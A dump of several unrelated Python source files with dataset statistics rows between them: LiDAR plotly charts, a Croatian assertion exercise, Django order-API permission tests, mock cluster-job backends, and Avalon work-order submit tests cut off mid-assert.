fig.update_xaxes(title_text="Sample",rangeslider_visible=False)
# Set y-axes titles
fig.update_yaxes(title_text="Error",showgrid=True)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
elif signal_type == "rangecorrected":
df = pd.DataFrame(empty_signal)
df.reset_index(inplace=True)
df.columns=["bin","TR0_500mV"]
df.index=df['bin']
fig = go.Figure()
fig = make_subplots() # rayleigh-fit secondary curve?
# Adding traces
fig.add_trace(
go.Scatter(
x=df.index,
y=df["TR0_500mV"],
mode="lines",
name="TR0 500mV",
marker_color='#39ac39',
opacity=1
),
secondary_y=False
)
# Add figure title
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="right",
x=0.93),
title={
'text': '<span style="font-size: 20px;">Range corrected LiDAR signal </span><br><span style="font-size: 10px;">(click and drag)</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'},
paper_bgcolor="#ffffff",
plot_bgcolor="#ffffff",
width=640, height=480
# width=800, height=600
)
# Set x-axis title
fig.update_xaxes(tickangle=45,title_text="Height [m]")
# Set y-axes titles
fig.update_yaxes(title_text="TR0 500mV",
secondary_y=False, showgrid=False)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
def plotly_lidar_rms(lidar_rms):
df = pd.DataFrame(lidar_rms)
df.reset_index(inplace=True)
df.columns=["sample","rms_error"]
fig = go.Figure(data=go.Scatter(
x=df['sample'],
y=df["rms_error"],
mode="lines",
name="RMS error",
# title="RMS TMS",
marker_color='#b23434',
opacity=1
))
fig.update_layout(
width=640,
height=480,
title={
'text': '<span style="font-size: 20px;">RMS Error</span>',
'y': 0.97,
'x': 0.45,
'xanchor': 'center',
'yanchor': 'top'}
)
# Set x-axes titles
fig.update_xaxes(title_text="Sample",rangeslider_visible=False)
# Set y-axes titles
fig.update_yaxes(title_text="Error",showgrid=True)
plot_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)
return plot_json
| 26.324324 | 144 | 0.600909 | 897 | 6,818 | 4.396878 | 0.168339 | 0.043357 | 0.023073 | 0.033722 | 0.841785 | 0.809331 | 0.766988 | 0.754564 | 0.754564 | 0.725659 | 0 | 0.042733 | 0.255207 | 6,818 | 258 | 145 | 26.426357 | 0.73395 | 0.085509 | 0 | 0.764706 | 0 | 0.010695 | 0.156759 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02139 | false | 0 | 0.042781 | 0 | 0.085562 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee3debb76166f216363f670ae34c1e1577aeff15 | 539 | py | Python | predavanje13/assertions.py | Miillky/uvod_u_programiranje | 209611e38c8fe84c727649df4b868a4278eb77c3 | [
"MIT"
] | null | null | null | predavanje13/assertions.py | Miillky/uvod_u_programiranje | 209611e38c8fe84c727649df4b868a4278eb77c3 | [
"MIT"
] | null | null | null | predavanje13/assertions.py | Miillky/uvod_u_programiranje | 209611e38c8fe84c727649df4b868a4278eb77c3 | [
"MIT"
] | null | null | null | # javljanje greške kada je unesen krivi datum
vrijednost = int(input("Unesi datum u veljači:"))
assert 0 < vrijednost < 29, "unijeli ste pogrešan datum!"
try:
vrijednost = int(input("Unesi datum u veljači:"))
assert 0 < vrijednost < 29, "unijeli ste pogrešan datum!"
except AssertionError:
print("pripazite na datum")
try:
vrijednost = int(input("Unesi datum u veljači:"))
assert 0 < vrijednost < 29, "unijeli ste pogrešan datum!"
except AssertionError as provjera:
print(provjera)
print("pripazite na datum") | 33.6875 | 61 | 0.70872 | 70 | 539 | 5.457143 | 0.385714 | 0.102094 | 0.141361 | 0.180628 | 0.746073 | 0.746073 | 0.746073 | 0.746073 | 0.746073 | 0.746073 | 0 | 0.020501 | 0.185529 | 539 | 16 | 62 | 33.6875 | 0.849658 | 0.079777 | 0 | 0.769231 | 0 | 0 | 0.369697 | 0 | 0 | 0 | 0 | 0 | 0.384615 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.230769 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee5c103daf9f8961018645c81c3df750ff658035 | 17,794 | py | Python | orders/tests.py | City-of-Turku/munpalvelut_backend | 9baa530f2f3405322f74ccc145641148f253341b | [
"MIT"
] | null | null | null | orders/tests.py | City-of-Turku/munpalvelut_backend | 9baa530f2f3405322f74ccc145641148f253341b | [
"MIT"
] | null | null | null | orders/tests.py | City-of-Turku/munpalvelut_backend | 9baa530f2f3405322f74ccc145641148f253341b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
from __future__ import unicode_literals
from django.core.urlresolvers import NoReverseMatch, reverse
from django.core import mail
from rest_framework import status
from rest_framework.test import APITestCase
from palvelutori import test_mixins
from palvelutori.models import User
from organisation.models import Company
from services.models import ServicePackage
from .models import Order
from copy import deepcopy
class OrderTest(test_mixins.BasicCRUDApiTestCaseSetupMixin, APITestCase):
object_class = Order
list_url_user = "api:user-orders-list"
list_url_company = "api:company-orders-list"
detail_url_user = "api:user-orders-detail"
detail_url_company = "api:company-orders-detail"
create_url_user = list_url_user
create_url_company = list_url_company
update_url_user = detail_url_user
update_url_company = detail_url_company
delete_url_user = detail_url_user
delete_url_company = detail_url_company
company = {
"id": 1,
"name": "Image Test",
"businessid": "123456-7",
"service_areas": ["20100", "20200"],
"price_per_hour": 10,
"price_per_hour_continuing": 9,
}
service_package = {
"id": 1,
"shortname": "palvelu-paketti",
"pricing_formula": "???",
"website": "example.com"
}
template_object = {
"user_first_name": "Test",
"user_last_name": "User",
"user_email": "test@example.com",
"user_phone": "+12345678",
"site_address_street": "Ääkköskatu 3",
"site_address_street2": "",
"site_address_postalcode": "12345",
"site_address_city": "Helsinki",
"site_room_count": 4,
"site_sanitary_count": 1,
"site_floor_count": 1,
"site_floor_area": 80.4,
"duration": 4,
"price": 400,
"timeslot_start": "2016-10-10T07:00:00Z",
"timeslot_end": "2016-10-10T11:00:00Z",
"extra_info": "",
"company_id": company['id'],
"service_package_id": service_package['id'],
"service_package_shortname": "palvelu-paketti"
}
@classmethod
def setUpTestData(cls):
template_users = deepcopy(cls.template_users)
template_users['normal_user2'].update({'company_id': cls.company['id']})
cls.template_users = template_users
template_object = deepcopy(cls.template_object)
template_object.update({'user_id': cls.template_users['normal_user1']['id']})
cls.template_object = template_object
Company.objects.create(**cls.company)
ServicePackage.objects.create(**cls.service_package)
super().setUpTestData()
# List
def test_list_anonymous(self):
"""
Anonymous user should NOT be able to list
"""
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': self.template_users['normal_user1']['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_list_normal_user(self):
"""
User should be able to list own orders
"""
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': user['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_list_company_user(self):
"""
Company user should be able to list own companys orders
"""
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': self.template_users['normal_user1']['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
def test_list_staff_user(self):
"""
Staff user should be able to list all orders
"""
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(self.list_url_user, kwargs={'user_pk': self.template_users['normal_user1']['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
# Company orders
url = reverse(self.list_url_company, kwargs={'company_pk': self.company['id']})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), len(self.objects))
# Retrieve
def test_detail_anonymous(self):
"""
Anonymous user should NOT be able to retrieve
"""
obj = self.objects[0]
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_detail_normal_user(self):
"""
User should be able to retrieve own orders
"""
obj = self.objects[0]
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_detail_company_user(self):
"""
Company user should be able to retrieve own companys orders
"""
obj = self.objects[0]
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_detail_staff_user(self):
"""
Staff user should be able to retrieve all orders
"""
obj = self.objects[0]
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
# User orders
url = reverse(
self.detail_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Company orders
url = reverse(
self.detail_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Create
def test_create_user_order(self):
"""
Anonymous users should not be able to create.
User should be able to create orders for him/herself.
Staff users should be able to create for other users.
"""
TEST_STR = 'Luonti testi'
payload = self.template_object.copy()
payload.pop('company_id', None)
payload.pop('service_package_id', None)
payload.update({
'company': self.company['id'],
'service_package': self.service_package['id'],
'extra_info': TEST_STR
})
url = reverse(
self.create_url_user,
kwargs={ 'user_pk': self.template_users['normal_user1']['id'] }
)
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['extra_info'], TEST_STR)
# Other user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
payload['extra_info'] = ''
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['extra_info'], '')
# Two messages should have been sent
self.assertEqual(len(mail.outbox), 2)
def test_create_company_order(self):
"""
Company orders can not be created.
"""
TEST_STR = 'Luonti testi'
payload = self.template_object.copy()
payload.pop('company_id', None)
payload.pop('service_package_id', None)
payload.update({
'user': self.template_users['normal_user1']['id'],
'service_package': self.service_package['id'],
'extra_info': TEST_STR
})
url = reverse(
self.create_url_company,
kwargs={ 'company_pk': self.company['id'] }
)
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.post(url, data=payload)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Update
def test_update_user_orders(self):
"""
No one should be able to update user orders
"""
obj = self.objects[0]
url = reverse(
self.update_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
# Anonymous user
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_company_orders(self):
"""
No one should be able to update company orders
"""
obj = self.objects[0]
url = reverse(
self.update_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
# Anonymous user
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.put(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Delete
def test_delete_user_orders(self):
"""
No one should be able to delete orders
"""
obj = self.objects[0]
url = reverse(
self.delete_url_user,
kwargs={
'pk': obj.id,
'user_pk': obj.user_id
}
)
# Anonymous user
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_company_orders(self):
"""
No one should be able to delete orders
"""
obj = self.objects[0]
url = reverse(
self.delete_url_company,
kwargs={
'pk': obj.id,
'company_pk': obj.company_id
}
)
# Anonymous user
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
# Owner user
user = self.template_users['normal_user2']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
# Other user
user = self.template_users['normal_user1']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
# Staff user
user = self.template_users['staff_user']
self.client.login(email=user['email'], password=user['password'])
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
| 34.153551 | 104 | 0.615826 | 2,056 | 17,794 | 5.117704 | 0.086576 | 0.060825 | 0.091808 | 0.110245 | 0.833112 | 0.793956 | 0.784071 | 0.78065 | 0.774568 | 0.741209 | 0 | 0.017529 | 0.269023 | 17,794 | 520 | 105 | 34.219231 | 0.79142 | 0.073901 | 0 | 0.644509 | 0 | 0 | 0.111028 | 0.008885 | 0 | 0 | 0 | 0 | 0.135838 | 1 | 0.043353 | false | 0.069364 | 0.031792 | 0 | 0.118497 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
ee83c36fa24a17f1da2e8e509cef2e2665c7c917 | 51 | py | Python | run.py | Bakley/bug-free-sniffle | 69a6b924ab754dad6b329763bd54659594aa698b | [
"MIT"
] | null | null | null | run.py | Bakley/bug-free-sniffle | 69a6b924ab754dad6b329763bd54659594aa698b | [
"MIT"
] | null | null | null | run.py | Bakley/bug-free-sniffle | 69a6b924ab754dad6b329763bd54659594aa698b | [
"MIT"
] | null | null | null | print('We are here')
print('We are following too')
| 17 | 29 | 0.705882 | 9 | 51 | 4 | 0.666667 | 0.388889 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137255 | 51 | 2 | 30 | 25.5 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.607843 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
ee8f0d4a953809b689b355585e7ce1630896c6a8 | 239 | py | Python | monique_worker_py/__init__.py | biocad/monique-worker-py | 56b0ab2e218b80e3a83d7987cd8dd8993a3d66a7 | [
"BSD-3-Clause"
] | null | null | null | monique_worker_py/__init__.py | biocad/monique-worker-py | 56b0ab2e218b80e3a83d7987cd8dd8993a3d66a7 | [
"BSD-3-Clause"
] | null | null | null | monique_worker_py/__init__.py | biocad/monique-worker-py | 56b0ab2e218b80e3a83d7987cd8dd8993a3d66a7 | [
"BSD-3-Clause"
] | null | null | null | from monique_worker_py.config import *
from monique_worker_py.qmessage import *
from monique_worker_py.task import *
from monique_worker_py.userdata import *
from monique_worker_py.worker import *
from monique_worker_py.component import *
| 34.142857 | 41 | 0.849372 | 36 | 239 | 5.305556 | 0.277778 | 0.34555 | 0.534031 | 0.596859 | 0.65445 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100418 | 239 | 6 | 42 | 39.833333 | 0.888372 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c9a8fe89d9e06f41e4a7bbe2a5de58be49c913dd | 2,271 | py | Python | tests/test_cli/custom_backends.py | timostrunk/clusterjob | a786c17bc83dff02835fed1f0b39b134992d668f | [
"MIT"
] | null | null | null | tests/test_cli/custom_backends.py | timostrunk/clusterjob | a786c17bc83dff02835fed1f0b39b134992d668f | [
"MIT"
] | null | null | null | tests/test_cli/custom_backends.py | timostrunk/clusterjob | a786c17bc83dff02835fed1f0b39b134992d668f | [
"MIT"
] | null | null | null | from clusterjob.backends import ClusterjobBackend
class Backend1(object):
"""Backend that has the right interface but does not derive from
ClustterjobBackend"""
name = 'backend1'
extension = 'slr'
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def get_status(self, response, finished=False):
return 0
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
class Backend2(ClusterjobBackend):
"""Backend that has a missing get_status method"""
name = 'backend2'
extension = 'slr'
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
class Backend3(ClusterjobBackend):
"""Backend that missed 'name' and 'extension' attributes"""
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def get_status(self, response, finished=False):
return 0
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
class Backend4(ClusterjobBackend):
"""Backend that matches the correct interface"""
name = 'backend4'
extension = 'slr'
def cmd_submit(self, jobscript):
return 'sbatch 1'
def get_job_id(self, response):
return '1'
def cmd_status(self, run, finished=False):
return 'squeue 1'
def get_status(self, response, finished=False):
return 0
def cmd_cancel(self, run):
return 'scancel 1'
def resource_headers(self, jobscript):
return []
def replace_body_vars(self, body):
return body
| 28.037037 | 68 | 0.641127 | 281 | 2,271 | 5.053381 | 0.206406 | 0.04507 | 0.107042 | 0.04507 | 0.745775 | 0.745775 | 0.745775 | 0.745775 | 0.745775 | 0.745775 | 0 | 0.015504 | 0.261559 | 2,271 | 80 | 69 | 28.3875 | 0.831246 | 0.097754 | 0 | 0.876923 | 0 | 0 | 0.067755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.415385 | false | 0 | 0.015385 | 0.415385 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 9 |
c9b69340cd0c437c7a037521df6b014a6045254d | 91,889 | py | Python | tests/automation_framework/tests/work_order_tests/test_submit.py | anjalirx-intel/avalon | 5efd20612948a324b8a393bfe22872aeb8527097 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/tests/work_order_tests/test_submit.py | anjalirx-intel/avalon | 5efd20612948a324b8a393bfe22872aeb8527097 | [
"Apache-2.0"
] | null | null | null | tests/automation_framework/tests/work_order_tests/test_submit.py | anjalirx-intel/avalon | 5efd20612948a324b8a393bfe22872aeb8527097 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import logging
import os
import env
from src.libs.avalon_test_wrapper \
import read_json, submit_request
from src.libs.test_base import AvalonBase
from src.utilities.verification_utils \
import verify_test, check_negative_test_responses
from src.utilities.worker_utilities import ResultStatus
logger = logging.getLogger(__name__)
class TestClass():
test_obj = AvalonBase()
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.p1
@pytest.mark.positive
def test_workordersubmit_success(self):
test_id = '18697'
request_file = os.path.join(
env.work_order_input_file,
"work_order_success.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_inDataDataEncryptionKey_hyphenecho(self):
test_id = '18783'
request_file = os.path.join(
env.work_order_input_file,
"work_order_inData_DataEncryptionKey_hyphen_echo.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_datahash_null(self):
test_id = '18713'
request_file = os.path.join(
env.work_order_input_file,
"work_order_data_datahash_null.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for data hash of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_requesterId_null(self):
test_id = '18739'
request_file = os.path.join(
env.work_order_input_file,
"work_order_requester_id_null.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_sessionkeyivInDataIv_hexstring(
self):
test_id = '18738'
request_file = os.path.join(
env.work_order_input_file,
"work_order_iv_indata_hex_string.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_verifysignature(self):
test_id = '18450'
request_file = os.path.join(
env.work_order_input_file,
"work_order_verify_signature.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_requesternonce_specialcharacters(
self):
test_id = '18736'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_requesterNonce_all_special_characters.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
